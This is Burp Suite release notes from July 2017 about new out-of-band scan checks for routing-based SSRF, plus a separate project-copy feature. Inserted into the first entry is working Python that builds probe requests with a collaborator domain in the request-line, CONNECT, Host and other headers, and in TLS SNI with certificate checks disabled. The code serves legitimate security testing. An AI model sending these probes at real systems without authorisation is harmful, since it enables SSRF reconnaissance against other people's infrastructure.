Thursday, July 27, 2017


This release adds a number of new scan checks based on our talk today at Black Hat, "Cracking the lens: targeting HTTP's hidden attack surface".

The new scan checks use various techniques aimed at inducing vulnerable applications and infrastructure to route requests to a different destination. This can lead to serious attacks, for example SSRF against the application server itself or against other infrastructure components such as front-end proxies and load balancers. The research behind the new capabilities quickly netted us over $30,000 in bug bounty payouts, and demonstrates the huge power of OAST (out-of-band application security testing), in which Burp Collaborator detects the target's DNS or HTTP interaction with an external server rather than relying on anything visible in the response.

The novelty of the new checks lies not so much in the payloads themselves as where they are placed. The new scan checks send Collaborator-based payloads in the following locations:
  • The HTTP Request-Line (where the requested URL normally appears).
  • The server name specified in the SSL SNI extension.
  • The server specified in a CONNECT request.
  • The Host header.
  • Various other common and not-so-common request headers.
An example of a reported vulnerability is shown below. For full details of these and various other techniques, see today's blog post.
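The following is an added example, not Burp's own scanner code, showing how the placements listed above can be reproduced by hand. It builds one raw HTTP/1.1 request per location (request-line, CONNECT target, Host header, and a few assumed host-style headers), puts a distinct subdomain of the OAST domain in each so that a DNS or HTTP callback identifies which placement the target routed on, and includes a separate function for the TLS SNI placement. The OAST domain `example-collab.invalid`, the target `target.example`, and the header list are placeholders you would replace with your own Collaborator domain and target.

```python
import socket
import ssl
from typing import Dict, Optional

# Assumed placeholders: substitute your own Collaborator/OAST domain and target.
OAST_DOMAIN = "example-collab.invalid"
TARGET_HOST = "target.example"

# Assumed set of host-style headers that front-ends and frameworks are known to
# consult when deciding where a request goes; extend the tuple for your target.
HOST_STYLE_HEADERS = ("X-Forwarded-Host", "X-Host", "X-Forwarded-Server")


def oast_label(placement: str) -> str:
    """Unique subdomain per placement so the callback names the vector that fired."""
    return f"{placement}.{OAST_DOMAIN}"


def request_variants(target_host: str, path: str = "/") -> Dict[str, bytes]:
    """Raw HTTP/1.1 requests keyed by placement, each carrying the payload in one location."""
    v: Dict[str, bytes] = {}

    # Request-line: absolute-form URI names the OAST host; Host still names the target.
    v["requestline"] = (
        f"GET http://{oast_label('requestline')}{path} HTTP/1.1\r\n"
        f"Host: {target_host}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()

    # CONNECT: a front-end that honours CONNECT will try to open a tunnel to the OAST host.
    v["connect"] = (
        f"CONNECT {oast_label('connect')}:443 HTTP/1.1\r\n"
        f"Host: {oast_label('connect')}:443\r\n\r\n"
    ).encode()

    # Host header: the usual routing key for virtual hosting and reverse proxies.
    v["hostheader"] = (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {oast_label('hostheader')}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()

    # Other headers: Host stays legitimate, the payload rides in one extra header at a time.
    for header in HOST_STYLE_HEADERS:
        key = header.lower()
        v[key] = (
            f"GET {path} HTTP/1.1\r\n"
            f"Host: {target_host}\r\n"
            f"{header}: {oast_label(key)}\r\n"
            "Connection: close\r\n\r\n"
        ).encode()
    return v


def send_with_sni(target_host: str, port: int = 443, timeout: float = 5.0) -> bytes:
    """TLS SNI placement: the handshake names the OAST host while the HTTP Host names the target.
    This is a live network call and is not exercised offline. Certificate checks are disabled
    deliberately because no served certificate can match the payload name; this is a test probe,
    not a production client."""
    sni_name = oast_label("sni")
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = f"GET / HTTP/1.1\r\nHost: {target_host}\r\nConnection: close\r\n\r\n".encode()
    with socket.create_connection((target_host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=sni_name) as tls:
            tls.sendall(req)
            return tls.recv(4096)


def placement_from_callback(queried_name: str) -> Optional[str]:
    """Map a DNS/HTTP callback hostname back to the placement that triggered it."""
    name = queried_name.rstrip(".").lower()
    suffix = "." + OAST_DOMAIN
    if not name.endswith(suffix):
        return None
    # The rightmost label before the OAST domain is the placement tag.
    return name[: -len(suffix)].split(".")[-1]


if __name__ == "__main__":
    for placement, raw_request in request_variants(TARGET_HOST).items():
        print(f"--- {placement} ---")
        print(raw_request.decode())
```

Send each variant over a plain socket to the target (and `send_with_sni` for the TLS case), then watch the OAST server's DNS and HTTP logs: a lookup of `hostheader.example-collab.invalid` tells you the Host header was used for routing, a lookup of `connect.example-collab.invalid` that something honoured CONNECT, and so on. A DNS-only callback still proves the target resolved an attacker-chosen name, which is enough to report even when no HTTP request follows.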
Tuesday, July 18, 2017


This release adds a new feature to save a copy of the current project.

You can choose the tools whose data you want to be included in the project file and whether you only want to save in-scope items.

The new feature is useful for various purposes:
  • You can begin working in a temporary project, and later save it to disk if it proves useful.
  • You can save a live backup copy of a disk-based project while continuing to work.
  • You can save a smaller copy of a project after refining your target scope or deleting unnecessary data.
Note that after Burp saves the copy of the current project, it continues working in the current project. If you want to switch to using the newly saved copy, you will need to restart Burp and select the new project file at startup.

Some bugs have also been fixed:
  • A bug that caused SNI not to work with upstream HTTP proxy servers.
  • A bug that caused the Burp Infiltrator patcher to cause bytecode corruption, or fail to patch at all, when certain unusual bytecode features were encountered.
  • A bug that could cause remembered user settings to be lost if the user closed down Burp during startup.
  • Various other bugfixes and enhancements.